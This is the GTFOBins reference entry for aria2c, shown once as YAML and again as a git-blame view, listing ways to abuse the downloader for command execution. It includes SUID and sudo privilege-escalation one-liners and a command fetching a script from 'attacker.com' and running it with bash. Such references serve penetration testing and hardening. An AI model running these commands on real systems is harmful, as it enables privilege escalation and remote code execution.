GTFOBins.github.io/_gtfobins/aria2c.md

---
description: Note that the subprocess is immediately sent to the background.
functions:
  execute-non-interactive:
    - code: |
        COMMAND='id'
        TF=$(mktemp)
        echo "$COMMAND" > $TF
        chmod +x $TF
        aria2c --on-download-error=$TF http://x
    - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
      code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
  suid-enabled:
    - code: |
        COMMAND='id'
        TF=$(mktemp)
        echo "$COMMAND" > $TF
        chmod +x $TF
        ./aria2c --on-download-error=$TF http://x
  sudo-enabled:
    - code: |
        COMMAND='id'
        TF=$(mktemp)
        echo "$COMMAND" > $TF
        chmod +x $TF
        sudo aria2c --on-download-error=$TF http://x
---
Add aria2c Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit 2018-09-07 11:53:15 +02:00			`---`
Add a full local version of aria2c and add --allow-overwrite Close #22 2018-09-07 13:30:55 +02:00			`description: Note that the subprocess is immediately sent to the background.`
Add aria2c Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit 2018-09-07 11:53:15 +02:00			`functions:`
			`execute-non-interactive:`
Add a full local version of aria2c and add --allow-overwrite Close #22 2018-09-07 13:30:55 +02:00			`- code: \|`
			`COMMAND='id'`
			`TF=$(mktemp)`
			`echo "$COMMAND" > $TF`
			`chmod +x $TF`
			`aria2c --on-download-error=$TF http://x`
Clarify aria2c --allow-overwrite As discussed in #22. 2018-09-07 13:46:22 +02:00			- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
Add a full local version of aria2c and add --allow-overwrite Close #22 2018-09-07 13:30:55 +02:00			`code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa`
Add aria2c Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit 2018-09-07 11:53:15 +02:00			`suid-enabled:`
Add a full local version of aria2c and add --allow-overwrite Close #22 2018-09-07 13:30:55 +02:00			`- code: \|`
			`COMMAND='id'`
			`TF=$(mktemp)`
			`echo "$COMMAND" > $TF`
			`chmod +x $TF`
			`./aria2c --on-download-error=$TF http://x`
Add aria2c Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit 2018-09-07 11:53:15 +02:00			`sudo-enabled:`
Add a full local version of aria2c and add --allow-overwrite Close #22 2018-09-07 13:30:55 +02:00			`- code: \|`
			`COMMAND='id'`
			`TF=$(mktemp)`
			`echo "$COMMAND" > $TF`
			`chmod +x $TF`
			`sudo aria2c --on-download-error=$TF http://x`
Add aria2c Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit 2018-09-07 11:53:15 +02:00			`---`